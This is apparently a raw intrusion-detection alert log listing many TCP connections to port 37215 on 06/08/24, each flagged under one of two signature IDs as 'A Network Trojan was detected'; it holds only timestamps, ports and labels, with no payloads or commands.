          Timestamp:06/08/24-15:05:46.443972
          SID:2829579
          Source Port:42464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731790
          SID:2835222
          Source Port:35692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070846
          SID:2835222
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671555
          SID:2829579
          Source Port:57944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075374
          SID:2835222
          Source Port:46278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170629
          SID:2829579
          Source Port:40532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704344
          SID:2829579
          Source Port:46544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787719
          SID:2829579
          Source Port:54684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264798
          SID:2835222
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855502
          SID:2829579
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745405
          SID:2835222
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163257
          SID:2835222
          Source Port:51128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844461
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742915
          SID:2829579
          Source Port:55394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378033
          SID:2829579
          Source Port:47102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106848
          SID:2829579
          Source Port:49846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744987
          SID:2835222
          Source Port:44014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514493
          SID:2835222
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495574
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861985
          SID:2835222
          Source Port:60042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731790
          SID:2835222
          Source Port:43314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810910
          SID:2829579
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709836
          SID:2829579
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542937
          SID:2829579
          Source Port:50610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136017
          SID:2835222
          Source Port:35168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269936
          SID:2835222
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176022
          SID:2835222
          Source Port:46996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857054
          SID:2835222
          Source Port:38314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747426
          SID:2835222
          Source Port:60016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176570
          SID:2829579
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257825
          SID:2835222
          Source Port:34902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395074
          SID:2835222
          Source Port:39046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466182
          SID:2829579
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912293
          SID:2835222
          Source Port:56708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351775
          SID:2829579
          Source Port:46884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306490
          SID:2835222
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894417
          SID:2829579
          Source Port:57824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176273
          SID:2829579
          Source Port:41702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017792
          SID:2835222
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258413
          SID:2835222
          Source Port:55900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352777
          SID:2835222
          Source Port:48248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353688
          SID:2829579
          Source Port:40128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109313
          SID:2829579
          Source Port:51466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178145
          SID:2835222
          Source Port:53570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063204
          SID:2829579
          Source Port:38594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131273
          SID:2835222
          Source Port:54352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116622
          SID:2829579
          Source Port:39324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817566
          SID:2835222
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353220
          SID:2835222
          Source Port:52264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035587
          SID:2829579
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550124
          SID:2835222
          Source Port:45640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792005
          SID:2835222
          Source Port:53820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857959
          SID:2829579
          Source Port:50370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512758
          SID:2835222
          Source Port:58426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804200
          SID:2829579
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160619
          SID:2835222
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782328
          SID:2829579
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599589
          SID:2829579
          Source Port:36554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160677
          SID:2829579
          Source Port:54046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352061
          SID:2835222
          Source Port:42952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133838
          SID:2835222
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791747
          SID:2829579
          Source Port:48430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898143
          SID:2835222
          Source Port:41982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161048
          SID:2835222
          Source Port:53280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035175
          SID:2829579
          Source Port:43042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542769
          SID:2829579
          Source Port:44132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745909
          SID:2835222
          Source Port:53434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550859
          SID:2829579
          Source Port:47674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406871
          SID:2835222
          Source Port:50688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108475
          SID:2835222
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706473
          SID:2835222
          Source Port:54430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796298
          SID:2829579
          Source Port:56948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.124968
          SID:2829579
          Source Port:35008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153041
          SID:2835222
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860066
          SID:2835222
          Source Port:50724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296701
          SID:2829579
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894827
          SID:2829579
          Source Port:46904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796246
          SID:2829579
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018171
          SID:2835222
          Source Port:37374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406003
          SID:2835222
          Source Port:36026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554410
          SID:2829579
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739900
          SID:2829579
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554459
          SID:2829579
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263969
          SID:2835222
          Source Port:46622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269260
          SID:2835222
          Source Port:38584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259735
          SID:2835222
          Source Port:56654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837147
          SID:2829579
          Source Port:39760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895873
          SID:2835222
          Source Port:60872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174465
          SID:2829579
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813056
          SID:2829579
          Source Port:35186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159125
          SID:2829579
          Source Port:40222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668610
          SID:2835222
          Source Port:40146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410688
          SID:2829579
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511035
          SID:2835222
          Source Port:42712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378254
          SID:2829579
          Source Port:48142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152513
          SID:2835222
          Source Port:48104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516425
          SID:2835222
          Source Port:60944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018503
          SID:2829579
          Source Port:46074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020570
          SID:2829579
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741595
          SID:2835222
          Source Port:41684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161712
          SID:2829579
          Source Port:43724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600306
          SID:2835222
          Source Port:35440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176355
          SID:2835222
          Source Port:41540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352727
          SID:2829579
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672407
          SID:2829579
          Source Port:44780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257584
          SID:2835222
          Source Port:42250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021406
          SID:2835222
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731930
          SID:2835222
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800844
          SID:2835222
          Source Port:51050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517337
          SID:2835222
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797972
          SID:2829579
          Source Port:54068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177426
          SID:2829579
          Source Port:40622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273531
          SID:2835222
          Source Port:34102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744500
          SID:2829579
          Source Port:58168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036140
          SID:2829579
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274561
          SID:2835222
          Source Port:52116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547781
          SID:2835222
          Source Port:55626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238034
          SID:2835222
          Source Port:42222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463212
          SID:2835222
          Source Port:53374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470656
          SID:2829579
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733073
          SID:2835222
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274388
          SID:2835222
          Source Port:55410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015029
          SID:2829579
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707732
          SID:2829579
          Source Port:34266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808666
          SID:2835222
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894658
          SID:2835222
          Source Port:55498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021911
          SID:2829579
          Source Port:36432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890861
          SID:2835222
          Source Port:57922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854353
          SID:2835222
          Source Port:55974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356123
          SID:2835222
          Source Port:50384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854653
          SID:2835222
          Source Port:37618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707985
          SID:2835222
          Source Port:47724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890521
          SID:2835222
          Source Port:46274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044083
          SID:2829579
          Source Port:45194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462334
          SID:2829579
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063321
          SID:2835222
          Source Port:52996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355918
          SID:2829579
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739408
          SID:2829579
          Source Port:48140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465574
          SID:2829579
          Source Port:44078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512510
          SID:2835222
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257201
          SID:2835222
          Source Port:45486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551425
          SID:2835222
          Source Port:40054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162731
          SID:2835222
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673578
          SID:2835222
          Source Port:34560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351007
          SID:2835222
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162744
          SID:2835222
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270944
          SID:2829579
          Source Port:48512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272225
          SID:2829579
          Source Port:35922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463924
          SID:2829579
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513533
          SID:2835222
          Source Port:60616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351966
          SID:2835222
          Source Port:51048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549251
          SID:2835222
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518145
          SID:2829579
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151043
          SID:2829579
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179180
          SID:2835222
          Source Port:32898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176097
          SID:2835222
          Source Port:48134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896771
          SID:2829579
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791745
          SID:2835222
          Source Port:53874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746438
          SID:2829579
          Source Port:59890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747501
          SID:2829579
          Source Port:41284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192282
          SID:2829579
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846750
          SID:2835222
          Source Port:41020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257626
          SID:2835222
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188293
          SID:2835222
          Source Port:43298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745410
          SID:2835222
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730693
          SID:2829579
          Source Port:59966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463082
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161360
          SID:2829579
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130075
          SID:2829579
          Source Port:45796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791929
          SID:2835222
          Source Port:45798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133780
          SID:2835222
          Source Port:36704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259572
          SID:2835222
          Source Port:45336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466234
          SID:2829579
          Source Port:42888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705084
          SID:2835222
          Source Port:37420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672955
          SID:2835222
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113800
          SID:2829579
          Source Port:48828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740612
          SID:2829579
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495747
          SID:2829579
          Source Port:48440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895901
          SID:2835222
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744392
          SID:2829579
          Source Port:59452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019717
          SID:2835222
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271265
          SID:2835222
          Source Port:52402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747581
          SID:2835222
          Source Port:57156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846705
          SID:2829579
          Source Port:51524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165559
          SID:2835222
          Source Port:52002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407204
          SID:2829579
          Source Port:51696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599739
          SID:2829579
          Source Port:56294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748036
          SID:2835222
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352611
          SID:2835222
          Source Port:38074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174685
          SID:2829579
          Source Port:56006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552025
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110285
          SID:2835222
          Source Port:49594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110465
          SID:2829579
          Source Port:58960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150741
          SID:2829579
          Source Port:33896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811600
          SID:2835222
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014914
          SID:2829579
          Source Port:37146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019231
          SID:2829579
          Source Port:34748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110127
